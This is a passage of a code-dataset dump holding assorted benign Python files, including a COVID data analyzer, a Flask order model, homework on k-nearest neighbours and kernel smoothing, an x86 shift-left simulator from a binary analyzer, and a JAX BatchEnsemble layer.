pivot_index)\n\n return l\n\n\ndef swap(array, i, j):\n \"\"\"Swap routine\"\"\"\n temp = array[i]\n array[i] = array[j]\n array[j] = temp\n","sub_path":"week4/rselect.py","file_name":"rselect.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493090146","text":"import utilities as u\nimport pandas as pd\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Analyzer:\n\n STATES = ['confirmed', 'death', 'recovered', 'current_infected']\n\n data = False\n include_country_regions = []\n 
exclude_country_regions = []\n include_province_states = []\n\n def __init__(self, confirmed, death, recovered, include_country_regions=[], exclude_country_regions=[], include_province_states=[]):\n self.include_country_regions = include_country_regions\n self.exclude_country_regions = exclude_country_regions\n self.include_province_states = include_province_states\n\n datasets_c = [self._clean_data(dataset)\n for dataset in [confirmed, death, recovered]]\n\n frame = {\n 'confirmed_total': datasets_c[0],\n 'death_total': datasets_c[1],\n 'recovered_total': datasets_c[2]}\n\n self.data = pd.DataFrame(frame)\n\n self.data['current_infected_total'] = self.data['confirmed_total'] - self.data['death_total'] - self.data['recovered_total']\n\n self._gen_change_data()\n self._gen_change_pct_data()\n self._gen_change_pct_avg_data()\n\n # self.data['confirmed_change%3a']\n\n self.data['lethality'] = self.data['death_total'] / self.data['recovered_total']\n\n def _gen_change_data(self):\n for state in self.STATES:\n self.data[state+'_change'] = self.data[state+'_total'].diff()\n\n def _gen_change_pct_data(self):\n for state in self.STATES:\n self.data[state+'_change%'] = self.data[state+'_total'].pct_change()\n\n def _gen_change_pct_avg_data(self, window=5):\n for state in self.STATES:\n self.data[state+'_change%'+str(window)+'a'] = self.data[state+'_change%'].rolling(window=window, min_periods=0).mean()\n\n def _clean_data(self, data):\n for country_region in self.exclude_country_regions:\n data = data[data['Country/Region'] != country_region]\n\n if len(self.include_country_regions) > 0:\n data = data[np.isin(data['Country/Region'], self.include_country_regions)]\n\n # TODO include_province_states filter\n\n data = data.drop(columns=['Province/State', 'Country/Region', 'Lat', 'Long'])\n data = data.aggregate('sum')\n data.index.name = 'date'\n data.index = pd.to_datetime(data.index)\n return data\n\n def get_dataframe(self):\n return self.data\n\n def graph_data(self, columns=[], since_x_days_ago=0, upto_x_days_ago=0):\n if len(columns) == 0:\n self.graph_totals(since_x_days_ago, upto_x_days_ago)\n else:\n for column in columns:\n plt.plot(self.data[column][-since_x_days_ago:len(self.data[column]) - upto_x_days_ago], label=column)\n plt.gcf().autofmt_xdate()\n plt.show()\n\n def graph_totals(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_total', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_change', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes_pct(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_change%', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes_pct_avg(self, since_x_days_ago=0, upto_x_days_ago=0, window=5):\n self._gen_change_pct_avg_data(window)\n self.graph_append('_change%'+str(window)+'a', since_x_days_ago, upto_x_days_ago)\n\n def graph_append(self, append='', since_x_days_ago=0, upto_x_days_ago=0):\n since_x_days_ago = -since_x_days_ago\n upto_x_days_ago = len(self.data) - upto_x_days_ago\n plt.plot(self.data['death'+append][since_x_days_ago:upto_x_days_ago], color='red', label='death')\n plt.plot(self.data['current_infected'+append][since_x_days_ago:upto_x_days_ago], color='purple', label='current infected')\n plt.plot(self.data['confirmed'+append][since_x_days_ago:upto_x_days_ago], color='orange', linestyle='dashed', label='confirmed total')\n plt.plot(self.data['recovered'+append][since_x_days_ago:upto_x_days_ago], color='green', 
label='recovered')\n        plt.gcf().autofmt_xdate()\n        plt.show()\n\n\nclass DataDownloader:\n\n    confirmed = False\n    death = False\n    recovered = False\n\n    def __init__(self):\n        if not (self.confirmed or self.death or self.recovered):\n            self.confirmed, self.death, self.recovered = u.fetch_virus_data()\n\n    def get_analyzer(self, include_country_regions=[], exclude_country_regions=[], include_province_states=[]):\n        return Analyzer(\n            self.confirmed,\n            self.death,\n            self.recovered,\n            include_country_regions,\n            exclude_country_regions,\n            include_province_states\n        )\n\n    def display_countries(self):\n        pd.options.display.max_rows = 1000\n        displayed = []\n        for country in self.confirmed['Country/Region']:\n            if country not in displayed:\n                print(country)\n                displayed.append(country)\n\n    def display_locations(self):\n        pd.options.display.max_rows = 1000\n        # select both columns with a list of labels\n        print(self.confirmed[['Province/State', 'Country/Region']])\n\n","sub_path":"src/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"574001833","text":"\"\"\"Defines the Order class.\r\n\r\nIncludes constructor, representation return, and serialization formatting.\r\n\r\n\"\"\"\r\n\r\nimport datetime\r\n\r\nfrom flask import session\r\n\r\nfrom admin.app.models import db\r\nfrom admin.app.models.session_models.customer import CustomerSession as Customer\r\nfrom admin.app.models.session_models.sale import SaleSession as Sale\r\nfrom admin.app.models.session_models.product import ProductSession as Product\r\n\r\n\r\nclass OrderSession(db.Model):\r\n    \"\"\"Order Class\"\"\"\r\n    __tablename__ = \"order_session\"\r\n    real_id = db.Column(db.Integer, primary_key=True)\r\n    id = db.Column(db.Integer)\r\n    sale_id = db.Column(db.Integer)\r\n    customer_id = db.Column(db.Integer)\r\n    timestamp_created = db.Column(db.DateTime)\r\n    session_id = db.Column(db.Text)\r\n\r\n    def __init__(\r\n            self, sale_id, customer_id, timestamp_created=None,\r\n            id=None, session_id=None):\r\n        self.sale_id = sale_id\r\n        self.customer_id = customer_id\r\n        self.timestamp_created = (\r\n            timestamp_created\r\n            if timestamp_created is not None\r\n            else datetime.datetime.utcnow()\r\n        )\r\n        self.id = id\r\n        self.session_id = session_id\r\n\r\n    def __repr__(self):\r\n        return \"<Order {}>\".format(self.id)\r\n\r\n    @property\r\n    def serialize(self):\r\n        \"\"\"Formats for JSON return.\r\n\r\n        This requires data from the Customer, Sale, and Product models.\r\n\r\n        \"\"\"\r\n        customer_obj = db.session.query(\r\n            Customer\r\n        ).filter_by(\r\n            id=self.customer_id,\r\n            session_id=session.sid\r\n        ).first()\r\n\r\n        sale_obj = db.session.query(\r\n            Sale\r\n        ).filter_by(\r\n            id=self.sale_id,\r\n            session_id=session.sid\r\n        ).first()\r\n\r\n        product_obj = db.session.query(\r\n            Product\r\n        ).filter_by(\r\n            id=sale_obj.product_id,\r\n            session_id=session.sid\r\n        ).first()\r\n\r\n        return {\r\n            \"id\": self.id,\r\n            \"sale_id\": self.sale_id,\r\n            \"sale_price\": str(sale_obj.price),\r\n            \"sale_product\": product_obj.name,\r\n            \"customer_id\": self.customer_id,\r\n            \"customer_email\": customer_obj.email,\r\n            \"timestamp_created\": self.timestamp_created\r\n        }\r\n","sub_path":"app/models/session_models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257187032","text":"# 04 - Consider the diversity statement: \"The Python Software Foundation and the global\n# Python community 
welcome and encourage participation by everyone. Our community\n# is based on mutual respect, tolerance, and encouragement, and we are working\n# to help each other live up to these principles. We want our community to be more\n# diverse: whoever you are, and whatever your background, we welcome you.\".\n# Generate a list of the words in this text with split(), then build a list\n# of the words that start or end with one of the letters in \"python\". Print\n# the resulting list. Remember to strip the special characters first, and\n# watch out for uppercase and lowercase letters.\n\ntext = '''\n    The Python Software Foundation and the global Python community welcome and encourage\n    participation by everyone. Our community is based on mutual respect, tolerance, and\n    encouragement, and we are working to help each other live up to these principles.\n    We want our community to be more diverse: whoever you are, and whatever your\n    background, we welcome you.\n'''\nfor special_character in ['\\n', '.', ':', ',']:\n    text = text.replace(special_character, '')\nwords = text.split(' ')\nwords_selected = []\nfor word in words:\n    match = ('p', 'y', 't', 'h', 'o', 'n')\n    word_lower = word.lower()\n    if word_lower.startswith(match) or word_lower.endswith(match):\n        words_selected.append(word)\nprint(words_selected)\n\n","sub_path":"semestre-01/algoritmos-e-logica-de-programacao/lista-04/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65057415","text":"\n\"\"\" Problem Set 01 starter code\n\nPlease make sure your code runs on Python version 3.5.0\n\nDue date: 2016-02-05 13:00\n\nStudent: Lien Tran, Class of 2016\n\"\"\"\n\nimport numpy as np\nfrom scipy import spatial\nfrom scipy.stats import norm\nfrom sklearn.neighbors import NearestNeighbors\nimport time\n\ndef my_knn(X, y, k=1):\n    \"\"\" Basic k-nearest neighbor functionality\n\n    k-nearest neighbor regression for a numeric test\n    matrix. Predictions are returned for the same data matrix\n    used for training. For each row of the input, the k\n    closest rows (using the l2 distance) in the training\n    set are identified. 
The mean of the observations y\n is used for the predicted value of a new observation.\n\n Args:\n X: an n by p numpy array; the data matrix of predictors\n y: a length n numpy array; the observed response\n k: integer giving the number of neighbors to include\n\n Returns:\n a 1d numpy array of predicted responses for each row of the input matrix X\n \"\"\"\n\n distmat = spatial.distance.squareform(spatial.distance.pdist(X))\n pred = []\n for i, row in enumerate(distmat):\n print()\n print (row)\n ind = np.argpartition(row, k)[:k]\n y_index = [distmat[i][x] for x in ind]\n print(\"ind\", ind)\n print(\"y_index\", y_index)\n print(i)\n total = 0\n for elm in ind:\n print(y[elm])\n total += y[elm]\n pred.append(total/float(k))\n return pred \n \n # distmat = spatial.distance.pdist(X)\n # pred = []\n # n = len(X)\n # for i, ri in enumerate(X):\n # i_dist = []\n # # get all distances for element i\n # for j, rj in enumerate(X):\n # if i == j:\n # continue\n # i_dist.append((getDist(i, j, distmat, n), j))\n # dist_list = [x[0] for x in i_dist]\n # #print i_dist\n # j_list = [x[1] for x in i_dist]\n # # get k+1 indexes of k+1 smaller distances (including 0, itself)\n # k_part = min(k, n-2)\n # ind = np.argpartition(dist_list, k_part)[:k]\n # # getting corresponding j's\n # y_index = [j_list[x] for x in ind]\n # total = 0\n # #print y_index\n # for elm in y_index:\n # total += y[elm]\n # pred.append(total/float(k))\n # return pred \n\n# def getDist(i, j, distmat, n):\n# # x < y\n# if i < j:\n# x = i\n# y = j\n# else:\n# x = j\n# y = i\n# if x == 0:\n# return distmat[y-1]\n# else:\n# return distmat[n*x -(x*((x+1)/2.0)) + y-x-1]\n\n\ndef my_ksmooth(X, y, sigma=1.0):\n \"\"\" Kernel smoothing function\n\n kernel smoother for a numeric test matrix with a Gaussian\n kernel. Prediction are returned for the same data matrix\n used for training. For each row of the input, a weighted\n average of the input y is used for prediction. 
The weights\n are given by the density of the normal distribution for\n the distance of a training point to the input.\n\n Args:\n X: an n by p numpy array; the data matrix of predictors\n y: a length n numpy vector; the observed response\n sigma: the standard deviation of the normal density function\n used for the weighting scheme\n\n Returns:\n a 1d numpy array of predicted responses for each row of the input matrix X\n \"\"\"\n\n distmat = spatial.distance.squareform(spatial.distance.pdist(X))\n pred = []\n for i, row in enumerate(X):\n total = 0.0\n numerator = 0.0\n denominator = 0.0\n for j, elm in enumerate(X):\n p = norm(scale=sigma).pdf((distmat[i][j])**2)\n numerator += y[j]*p\n denominator += p\n total = numerator/denominator\n print(total)\n pred.append(total)\n return pred\n\n # distmat = spatial.distance.pdist(X)\n # pred = []\n # n = len(X)\n # for i, ri in enumerate(X):\n # i_dist = []\n # # get all distances for element i\n # for j, rj in enumerate(X):\n # if i == j:\n # continue\n # i_dist.append((getDist(i, j, distmat, n), j))\n # # getting corresponding j's\n # total = 0\n # for elm in i_dist:\n # total += y[elm[1]]*norm(scale=sigma).pdf(elm[0])\n # pred.append(total/float(n))\n # return pred\n\n\n# X = [[1,2,3,4,5],[6,7,8,9,0],[1,4,67,3,5],[11,22,3,0,4]]\n# d = spatial.distance.pdist(X)\n# print d\n# print getDist(0, 1, d, 4)\n# print getDist(0, 2, d, 4)\n# print getDist(0, 3, d, 4)\n# print getDist(1, 2, d, 4)\n# print getDist(1, 3, d, 4)\n# print getDist(2, 3, d, 4)\n# print\n\n# X1 = [[1,2,3,4,5],[6,7,8,9,0]]\n# X2 = [[1,2,3,4,5],[1,4,67,3,5]]\n# X3 = [[1,2,3,4,5], [11,22,3,0,4]]\n# X4 = [[6,7,8,9,0], [1,4,67,3,5]]\n# X5 = [[6,7,8,9,0], [11,22,3,0,4]]\n# X6 = [[1,4,67,3,5],[11,22,3,0,4]]\n# print spatial.distance.pdist(X1)\n# print spatial.distance.pdist(X2)\n# print spatial.distance.pdist(X3)\n# print spatial.distance.pdist(X4)\n# print spatial.distance.pdist(X5)\n# print spatial.distance.pdist(X6)\n\n# y = [3,5,2,4]\n\n# start = time.clock()\n\n#print my_knn(X, y, 2)\n# print my_ksmooth(X, y, 1)\n\n# elapsed = time.clock() - start\n# print(\"Run time is \", elapsed)\n# print\n# print(\"running scipy's knn\")\n# start = time.clock()\n# X_ = np.array([[1,2,3,4,5],[6,7,8,9,0],[1,4,67,3,5],[11,22,3,0,4]])\n# nbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree').fit(X)\n# distances, indices = nbrs.kneighbors(X)\n# print indices\n# print distances\n# elapsed = time.clock() -start\n# print(\"Run time is \", elapsed)\n#print(my_knn(np.matrix([[0,2],[0,4],[0,7],[0,8],[0,8],[0,9]]),[1,2,3,4,5,6],k=3))\n# print(my_ksmooth(np.matrix([[0,2],[0,4],[0,7],[0,8],[0,8],[0,9]]),np.array([1,2,3,4,5,6])))\n\n\n","sub_path":"Pset1/llt23_pset01/pset01.py","file_name":"pset01.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646183445","text":"'''\n손님들을 초대하여 파티를 계획하는 아이유는 가장 먼저 과일을 종류별로 일정한\n갯수만큼씩 준비하려고 한다. 과일 리스트 중 집에 있는 과일과 추가로 준비할 과일의\n리스트를 data.txt 파일과 같이 작성해 보았다. 과일 당 최소 5개씩 준비하려고 하며\n과일의 1개당 가격을 조사하였습니다. 
5개 이하인 과일은 5개가 되도록 사려고 할 때,\n사야할 과일과 그에 드는 각각의 비용과 총비용을 출력하는 프로그램을 작성하시오.\n\n<샘플 예>\n과일명 가격 개수 \n 사과 1500 5\n 메론 2200 2 \n 참외 1300 5\n 수박 9000 3\n 포도 4500 4\n 망고 1990 3\n 금귤 1100 1\n\n<실행 예>\n\n추가 구매 과일 리스트, 갯수 및 소요비용\n 메론 3개 6600원\n 수박 2개 18000원\n 포도 1개 4500원\n 망고 2개 3980원\n 금귤 4개 4400원\n\n총 구매 소요 비용 37480\n\n'''\nfrom fruitPurchase_sub import fruitPurchase\n\n\nfp = open('data.txt', 'r', encoding='utf-8')\nstrList = fp.read().splitlines()\nfp.close()\n\n\nfruitDics = {}\n\nfor fruit in strList:\n dataList = fruit.split()\n fruitDics[dataList[0]] = list(map(int, dataList[1:])) # 주의!!!! 파일에서 읽어온 모든 데이터는 문자이다\n \n \nresDics, total = fruitPurchase(fruitDics)\n\nprint(\"추가 구매 과일 리스트, 갯수 및 소요비용\")\n\nfor item in resDics:\n print(\"{:>6}\".format(item), end=' ')\n print(\"{:3d}개\".format(resDics[item][0]), end=' ')\n print(\"{:10d}원\".format(resDics[item][1]))\nprint(\"\\n총 구매 소요 비용 %d\" % total)\n\n","sub_path":"Python_Practice/Python실습-김도연/제공/Mission3/종합실습5_과일구매/fruitPurchase_main.py","file_name":"fruitPurchase_main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"468051974","text":"# ------------------------------------------------------------------------------\n# Access to the CodeHawk Binary Analyzer Analysis Results\n# Author: Henny Sipma\n# ------------------------------------------------------------------------------\n# The MIT License (MIT)\n#\n# Copyright (c) 2016-2020 Kestrel Technology LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# ------------------------------------------------------------------------------\n\nimport chb.asm.X86OpcodeBase as X\nimport chb.simulate.SimulationState as S\nimport chb.simulate.SimUtil as SU\nimport chb.simulate.SimValue as SV\n\nclass X86ShiftLeft(X.X86OpcodeBase):\n\n # tags: [ 'shl' ]\n # args: [ dst-op, src-op ]\n def __init__(self,x86d,index,tags,args):\n X.X86OpcodeBase.__init__(self,x86d,index,tags,args)\n\n def get_dst_operand(self): return self.x86d.get_operand(self.args[0])\n\n def get_src_operand(self): return self.x86d.get_operand(self.args[1])\n\n def get_operands(self):\n return [ self.get_dst_operand(), self.get_src_operand() ]\n\n # xdata: [ \"a:vxxxx\": lhs, rhsbase, rhs-expr, rhs-result, rhs-result-simplified ]\n def get_annotation(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5:\n lhs = str(xprs[0])\n rhs = str(xprs[3])\n rrhs = str(xprs[4])\n rrhs = X.simplify_result(xargs[3],xargs[4],rhs,rrhs)\n return lhs + ' = ' + rrhs\n else:\n return (self.tags[0] + ':????')\n\n def get_lhs(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5: return [ xprs[0] ]\n else: return []\n\n def get_rhs(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5: return [ xprs[2] ]\n else: return []\n\n # --------------------------------------------------------------------------\n # Shifts the bits in the first operand (destination operand) to the left by\n # the number of bits specified in the second operand (count operand).\n # The count operand can be an immediate value or the CL register. The count\n # is masked to 5 bits. Bits shifted beyond the destination operand boundary\n # are first shifted into the CF flag, then discarded. At the end of the shift\n # operation, the CF flag contains the last bit shifted out of the\n # destination operand. For each shift count, the most significant bit of the\n # destination operand is shifted into the CF flag, and the least significant\n # bit is cleared.\n #\n # The OF flag is affected only on 1-bit shifts. The OF flag is set to 0 if\n # the most-significant bit of the result is the same as the CF flag (that\n # is, the top two bits of the original operand were the same); otherwise,\n # it is set to 1.\n #\n # Flags affected:\n # The CF flag contains the value of the last bit shifted out of the\n # destination operand; it is undefined for SHL instructions where\n # the count is greater than or equal to the size (in bits) of the destination\n # operand. The OF flag is affected only for 1-bit shifts; otherwise, it is\n # undefined. The SF, ZF, and PF flags are set according to the result. If the\n # count is 0, the flags are not affected. 
For a non- zero count, the AF flag\n # is undefined.\n # --------------------------------------------------------------------------\n def simulate(self,iaddr,simstate):\n srcop = self.get_src_operand()\n dstop = self.get_dst_operand()\n srcval = simstate.get_rhs(iaddr,srcop)\n dstval = simstate.get_rhs(iaddr,dstop)\n (cflag,result) = dstval.bitwise_shl(srcval)\n simstate.set(iaddr,dstop,result)\n if srcval.value > 0:\n simstate.update_flag('CF',cflag)\n if srcval.value == 1:\n msb = result.get_msb()\n if not (msb == cflag):\n simstate.clear_flag('OF')\n else:\n simstate.set_flag('OF')\n else:\n simstate.undefine_flag('OF')\n simstate.update_flag('CF',cflag)\n simstate.update_flag('SF',result.is_negative())\n simstate.update_flag('ZF',result.is_zero())\n simstate.update_flag('PF',result.is_odd_parity())\n","sub_path":"chb/asm/bitwise/X86ShiftLeft.py","file_name":"X86ShiftLeft.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64806038","text":"'''\nFind and list all four-digit numbers in decimal notation that have the property that the sum of\ntheir four digits equals the sum of their digits when represented in hexadecimal (base 16) notation\nand also equals the sum of their digits when represented in duodecimal (base 12) notation.\nFor example, the number 2991 has the sum of (decimal) digits 2 + 9 + 9 + 1 = 21. Since 299\n1 = 1*1728 + 8*144 + 9*12 + 3, its duodecimal representation is 1893, and these digits also sum\nup to 21. But in hexadecimal, 2991 is BAF16, and 11 + 10 + 15 = 36, so 2991 should be rejected\nby your program.\nThe next number (2992), however, has digits that sum to 22 in all three representations (including\nBB016), so 2992 should be on the listed output. 
(We don’t want decimal numbers with fewer\nthan four digits—excluding leading zeros—so that 2992 is the first correct answer.)\n\ninput : an integer number\noutput : consecutive specialized four_digit number counted for input\n\n'''\nfrom sys import stdin, stdout\n\nimport string\ndef int2base(integer, base):\n if not integer: return '0'\n sign = 1 if integer > 0 else -1\n alphanum = string.digits + string.ascii_lowercase\n nums = alphanum[:base]\n res = ''\n integer *= sign\n while integer:\n integer, mod = divmod(integer, base)\n res += nums[mod]\n return ('' if sign == 1 else '-') + res[::-1]\nconv = {\"0\":0, \"1\":1, \"2\":2,\"3\":3, \"4\":4,\"5\":5,\"6\":6,\"7\":7,\"8\":8,\"9\":9,\"a\":10,\"b\":11,\"c\":12,\"d\":13,\"e\":14,\"f\":15}\ndef sum_digits(n):\n ns = str(n)\n while (len(ns)>2):\n n = sum([conv[x] for x in ns])\n ns = str(n)\n return ns\n\n#print(int2base(2991, 12))\n#print(sum_digits(1893))\n\ncnt = int(stdin.readline())\nstart = 2990\ndone = 0\nwhile done < cnt:\n start += 1\n a = sum_digits(start)\n b = sum_digits(int2base(start, 12))\n c = sum_digits(int2base(start, 16))\n if a == b == c:\n print(start)\n done += 1\n\n\n\n\n\n\n","sub_path":"Old_online_judges/specialized_four_digit_number.py","file_name":"specialized_four_digit_number.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57506286","text":"'''\nTest program 1\nauthor James Heliotis\n'''\n\nfrom ticket_booth import Ticket, SecurityBreach\nfrom protection import privilege, main_program, log\n\n@privilege( Ticket.ADMIN )\n@log\ndef admin_only( tag, x, y ):\n return x + y\n\n@log\n@privilege( Ticket.MANAGER )\ndef mgr_admin( tag, q ):\n print( \"Quota set to\", q )\n\n@log\n@privilege( Ticket.USER )\ndef anyone( tag, name ):\n return \"Hello, \" + name\n\nJAMES = \"James\"\nMOHAN = \"Mohan\"\nLINUS = \"Linus\"\n\n@main_program( \"log1.txt\" )\ndef test1():\n tickets = dict()\n tickets[ JAMES ] = Ticket( 6 );\n tickets[ MOHAN ] = Ticket( 106 );\n tickets[ LINUS ] = Ticket( 2000 );\n for who in JAMES, MOHAN, LINUS:\n try:\n print( \"TEST: calling 'anyone' function as\", who )\n print( anyone( tickets[ who ], who ) )\n except SecurityBreach as e:\n print( e )\n try:\n print( \"TEST: calling 'mgr_admin' function as\", who )\n mgr_admin( tickets[ who ], 1000 )\n except SecurityBreach as e:\n print( e )\n try:\n print( \"TEST: calling 'admin_only' function as\", who )\n print( \"3 + 11 = \" + str( admin_only( tickets[ who ], 3, 11 ) ) )\n except SecurityBreach as e:\n print( e )\n\nif __name__ == '__main__':\n test1()\n","sub_path":"AspectProgramming/Lab4/privilege_test_1.py","file_name":"privilege_test_1.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172842133","text":"\"\"\"Test case implementation\"\"\"\n\nimport unittest\n\n\nclass StaticTestCase(unittest.TestCase):\n\n @staticmethod\n def assertParameterInit(sbml):\n \"\"\"\n Checks whether the parameter values have been initialized\n Parameter values are considered unset if a model does not contain\n a setting for the \"value\" attribute of a parameter, nor does it has\n a default value\n :param sbml: a simple_sbml representation of the model\n :return: True iff all of the parameters have been initialized\n \"\"\"\n # iterate through all of the parameters\n for parameter in sbml.parameters:\n if not parameter.isSetValue():\n return False\n return True\n\n 
@staticmethod\n def assertParameterValNotZero(sbml):\n \"\"\"\n Checks whether the parameter value is initialized, and is a non-zero number\n :param sbml: a simple_sbml representation of the model\n :param an_id: string representation of the id\n :return: True iff the value is initialized, and is a non-zero number\n False iff the value is initialized, but is set to zero\n None if the value is not initialized\n \"\"\"\n for parameter in sbml.parameters:\n if not parameter.isSetValue():\n return None\n elif parameter.getValue() == 0:\n return False\n return True\n\n @staticmethod\n def assertSpeciesInit(sbml):\n \"\"\"\n Checks whether the values of all chemical species referenced in a\n kinetics law has been initialized\n :param sbml: a simple_sbml representation of the model\n :return: True iff all of the species referenced in the kinetics law\n has been initialized\n \"\"\"\n reactions = sbml.reactions # get all of the reactions involved\n for reaction in reactions:\n # get all of the parameters' and species' names involved in the reaction\n symbols = reaction.kinetic_law._getSymbols()\n for symbol in symbols:\n species = sbml.getSpecies(symbol)\n # skip all of the parameters, see assertParameterInit for parameter testing\n if species is None:\n continue\n if not species.isSetInitialConcentration(): # initial amount\n return False\n return True\n\n # kinetics expression\n # A + B -> C; k1*A*B, mass action\n # A + B + C -> D; k1*A*B, counter\n # A + B -> C; k1*C, c starts non-zero, or another action in place\n # symbols -> also reactants in the reaction and all reactants in the reaction are symbols\n # could be exceptions\n # warnings and failures\n\n # networkx\n","sub_path":"src/km_test.py","file_name":"km_test.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381963722","text":"# coding=utf-8\n# Copyright 2021 The Edward2 Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Uncertainty-based dense layers in JAX.\"\"\"\n\nfrom typing import Iterable, Callable, Optional\n\nimport flax.linen as nn\nimport jax.numpy as jnp\n\nDType = type(jnp.float32)\nInitializeFn = Callable[[jnp.ndarray, Iterable[int], DType], jnp.ndarray]\n\n\nclass DenseBatchEnsemble(nn.Module):\n \"\"\"A batch ensemble dense layer.\n\n Attributes:\n features: the number of output features.\n ens_size: the number of ensemble members.\n activation: activation function.\n use_ensemble_bias: whether to add a bias to the BE output (default: True).\n dtype: the dtype of the computation (default: float32).\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n \"\"\"\n features: int\n ens_size: int\n activation: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None\n use_ensemble_bias: bool = True\n dtype: Optional[DType] = None\n alpha_init: InitializeFn = nn.initializers.ones\n gamma_init: InitializeFn = nn.initializers.ones\n kernel_init: InitializeFn = 
nn.initializers.xavier_uniform()\n bias_init: InitializeFn = nn.initializers.zeros\n\n @nn.compact\n def __call__(self, inputs):\n \"\"\"Applies layer to input.\n\n Args:\n inputs: jnp.ndarray of shape [ens_size * batch_size, ..., input_dim].\n\n Returns:\n jnp.ndarray of shape [ens_size * batch_size, ..., features].\n \"\"\"\n dtype = self.dtype or inputs.dtype\n inputs = jnp.asarray(inputs, dtype)\n input_dim = inputs.shape[-1]\n\n kernel = self.param('kernel', self.kernel_init, (input_dim, self.features),\n dtype)\n alpha = self.param('fast_weight_alpha', self.alpha_init,\n (self.ens_size, input_dim), dtype)\n gamma = self.param('fast_weight_gamma', self.gamma_init,\n (self.ens_size, self.features), dtype)\n\n inputs_shape = inputs.shape\n inputs = jnp.reshape(inputs, (self.ens_size, -1) + inputs_shape[1:])\n outputs = jnp.einsum('E...C,EC,CD,ED->E...D', inputs, alpha, kernel, gamma)\n\n if self.use_ensemble_bias:\n bias = self.param('bias', self.bias_init, (self.ens_size, self.features),\n dtype)\n bias_shape = (self.ens_size,) + (1,) * (outputs.ndim - 2) + (\n self.features,)\n outputs = outputs + jnp.reshape(bias, bias_shape)\n\n if self.activation is not None:\n outputs = self.activation(outputs) # pylint: disable=not-callable\n\n return jnp.reshape(outputs, inputs_shape[:-1] + (self.features,))\n","sub_path":"edward2/jax/nn/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145284103","text":"import json\n\nwith open('cities.json') as d:\n\tcity = json.load(d)\nwith open('city_detailed.json') as d:\n\tcity_d = json.load(d)\ni=0\nx=[]\nfor c in city:\n\tif c['name'].lower() in city_d.keys():\n\t\tx.append({})\n\t\tx[i]['name'] = c['name'].lower()\n\t\tx[i]['lat'] = city_d[c['name'].lower()]['latitude']\n\t\tx[i]['long'] = city_d[c['name'].lower()]['longitude']\n\t\tx[i]['state'] = c['state'].lower()\n\t\ti+=1\nwith open('city_merged.json','w') as d:\n\t json.dump(x,d)\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625551929","text":"from sqlalchemy import Column, Integer, String, DateTime, ForeignKey, func\nfrom sqlalchemy.orm import relationship, class_mapper\nfrom 